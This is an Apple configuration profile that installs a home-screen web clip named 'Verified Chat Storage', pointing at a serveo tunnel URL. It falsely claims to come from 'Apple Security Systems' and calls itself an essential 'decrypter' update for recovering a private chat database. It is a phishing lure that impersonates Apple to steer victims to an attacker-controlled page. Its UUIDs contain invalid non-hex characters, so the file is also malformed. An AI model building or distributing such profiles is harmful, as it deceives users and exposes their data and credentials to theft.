<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>PayloadContent</key>
	<array>
		<dict>
			<key>PayloadDescription</key>
			<string>Configures secure browser access and verification.</string>
			<key>PayloadDisplayName</key>
			<string>Secure Verification Web Service</string>
			<key>PayloadIdentifier</key>
			<string>com.apple.webclip.managed.1</string>
			<key>PayloadType</key>
			<string>com.apple.webclip</string>
			<key>PayloadUUID</key>
			<string>D5E6F7G8-H9I0-J1K2-L3M4-N506P7Q8R9S0</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
			<key>URL</key>
			<string>https://officiis.serveousercontent.com</string>
			<key>Label</key>
			<string>Verified Chat Storage</string>
		</dict>
	</array>
	<key>PayloadDescription</key>
	<string>Hatima Secured Decrypter - Essential update to recover private chat database.</string>
	<key>PayloadDisplayName</key>
	<string>Hatima Secured Decrypter V4</string>
	<key>PayloadIdentifier</key>
	<string>com.apple.security.decrypter.v4</string>
	<key>PayloadOrganization</key>
	<string>Apple Security Systems</string>
	<key>PayloadType</key>
	<string>Configuration</string>
	<key>PayloadUUID</key>
	<string>E5F6G7H8-I9J0-K1L2-M3N4-05P6Q7R8S9T0</string>
	<key>PayloadVersion</key>
	<integer>1</integer>
</dict>
</plist>
